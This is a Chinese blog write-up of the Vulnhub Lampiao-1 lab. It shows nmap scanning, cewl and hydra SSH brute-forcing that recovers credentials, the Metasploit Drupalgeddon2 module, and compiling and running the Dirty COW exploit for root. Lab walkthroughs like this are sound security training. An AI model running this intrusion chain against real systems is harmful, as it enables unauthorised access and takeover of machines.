专栏首页网络攻防实战知识交流带妹玩转vulnhub(四)

带妹玩转vulnhub(四)

前言

今天我们请到了炫酷的女装大佬,和我一起为大家进行讲解,这次就不带妹子玩了,毕竟有女装大佬,真香!?

带妹是不可能带妹的,这辈子都不可能带妹的?

开始

下载

同样的在Vulnhub上下载对应的镜像下载链接 https://www.vulnhub.com/entry/lampiao-1,249/

基本配置

这都已经第四篇了,就不多介绍了。参考着官网上的说明来就可以咯,我这英语不及格的都能看懂,各位朋友还看不懂么??

女装大佬鄙夷的眼神?,切!

信息搜集

主机发现

netdiscover -r 192.168.43.0/24

端口扫描

使用nmap 192.168.43.52,这里吸取了前面的教训,我使用如下命令进行更加详细的扫描

nmap -O -sV -p- -T4 192.168.43.52

这样便可以尽最大可能的获取更多的信息。

开始渗透

访问80端口一段鬼画符

看看1898都有什么东西,是一个drupal搭建的网站, 这又是涉及到web了,我太菜表示没有思路,不过这种开源框架搭建的网站应该会有很多漏洞的吧,网上搜罗了一番找到了两种方法可以解决。

这时炫酷的女装大佬表示,你个菜鸡?,闪开,让我来。 只见大佬从口袋里掏出一把梭,上去就是干! 等我从眩晕中清醒过来后,发现大佬已经拿下root 此时的光芒太刺眼,我赶紧低下了头,暗暗下定决心以后再以不敢带妹了,跟着炫酷的女装大佬混准没错!真香!? 最后通过命令行,我找到了大佬操作的蛛丝马迹。

漏洞利用

drupal漏洞利用

1

方法一

这里涉及到kali下的两个工具cewl 和 hydra 关于cewl的介绍可以参考这篇文章

https://tools.kali.org/password-attacks/cewl

通过这个工具可以针对指定的网站,生成一个单词列表

通过robtos.txt我们可以知道一些参数提交的方式(不知道这样子描述是否正确),为了生成一个单词列表,我们需要遍历这个网站上的所有文章,所以尝试访问http://192.168.43.52:1898/?q=node/1这个页面,便可以看到所有的文章。于是cewl的命令如下:

cewl -w wordlist.txt http://192.168.43.52:1898/?q=node/1

然后使用hydra爆破ssh登陆的用户名和密码,这个在上一篇文章有用到哦? 通过查看文章我发现两个可疑的用户名。

最后我通过如下命令进行爆破。

hydra -L username.txt -P wordlist.txt ssh://192.168.43.52:22

可以得到用户民tiago和密码Virgulino

2

我在另一篇文章中看到了可以直接使用kali下的msf进行攻击。 主要命令如下:

use exploit/unix/webapp/drupal_drupalgeddon2

set rhost 192.168.43.52

set rport 1898

exploit

但是我个人感觉msf的shell没有ssh好用,所以最后还是选择使用ssh进行连接

权限提升

权限提升

ssh登陆并查看一些基本版本和权限信息。

根据版本号,我们可以利用CVE-2016-5195对其进行提权,之前我也介绍过github上别人收集的库,这里也就不具体说了,使用scp将源代码上传至目标主机,按着要求进行编译,之后我们便可以获取root权限。 参考的漏洞网站

https://www.exploit-db.com/exploits/40847/

scp 40847.c tiago@192.168.43.52:40847.c g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.c -lutil ./dcow -s

这里可以使用一个脚本自动查找适合什么漏洞

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

至此已经生无可恋,这次有女装大佬带我飞,真的不要太刺激,以后端茶倒水的活就交给我好了。

炫酷的女装大佬发话了,欢迎妹子加入,包教包会。 你心动了么?方正我是心动了? 诶,大佬等等我? 只见大佬一脚油门便消失在天际,只留下一串文字

279800B8148548F6CC3F9E58D03BBCCC

这难道是在暗示我?,哦耶!!?

总结

这次总体难度不大,也不算复杂,主要是两个工具cewl 和 hydra还有一些常见的漏洞。

人都走完了,我在路边随手解开一辆共享单车?‍♀️,悠然的骑走了 带妹是不可能的,这辈子都不可能的!?

参考文章

http://www.hackingarticles.in/hack-the-lampiao-1-ctf-challenge/

本文分享自微信公众号 - 无级安全(wujisec)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-04-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 限流系统如何发现系统的热点

    限流系统是对资源调用的控制组件,主要涵盖授权、限流、降级、调用统计等功能模块。限流系统有两个基础概念:资源和策略,对特定的资源采取不同的控制策略,起到保障应用稳...

    黄泽杰
  • API测试的基本指南

    API测试,或应用程序编程接口测试,是一种软件测试,涉及验证和验证API和Web服务。它也是集成测试的一部分,它决定开发的api是否满足测试人员预先建立的期望,...

    软测小生
  • 深入分析ThreadLocal

    ThreadLocal是啥?以前面试别人时就喜欢问这个,有些伙伴喜欢把它和线程同步机制混为一谈,事实上ThreadLocal与线程同步无关。ThreadLoca...

    黄泽杰
  • 手写dubbo框架1-基本原理

    本系列,原本由之前挖的坑,现在来填。之间在讲述动态代理,谈及mybatis、dubbo的源码,大家也可以前往了解,点击"阅读原文"查看。手写dubbo,...

    far
  • eclipse本地svn插件与库版本不一致更新等操作出错解决方法

    org.apache.subversion.javahl.ClientException: The working copy needs to be upgra...

    ZhangXianSheng
  • 浅入深出Vue:工具准备之PostMan安装配置及Mock服务配置

    由于家中有事,文章没顾得上。在此说声抱歉,这是工具准备的最后一章。 接下来就是开始环境搭建了~尽情期待

    若羽
  • restapi(0)- 平台数据维护,写在前面

    在云计算的推动下,软件系统发展趋于平台化。云平台系统一般都是分布式的集群系统,采用大数据技术。在这方面akka提供了比较完整的开发技术支持。我在上一个系列...

    用户1150956
  • 【一起来烧脑】读懂HTTP知识体系

    读懂HTTP很重要,参加过面试的小伙伴都很清楚,无论是技术面试面试题出得怎样,都有机会让你讲解一下HTTP,大部分都会问一下。

    达达前端
  • 网站安全漏洞检测详情与修复方案

    Metinfo CMS系统被爆出网站存在漏洞,可上传任意文件到网站根目录下,从而使攻击者可以轻易的获取网站的webshell权限,对网站进行篡改与攻击,目前该网...

    技术分享达人
  • 浅谈密码学

    密码学是研究如何隐密地传递信息的学科。那怎样才能隐密地传递信息呢?密码学里的答案就是对原文进行加密。主流的加密主要分成两大类:对称加密和非对称加密。

    小蜜蜂

扫码关注云+社区

领取腾讯云代金券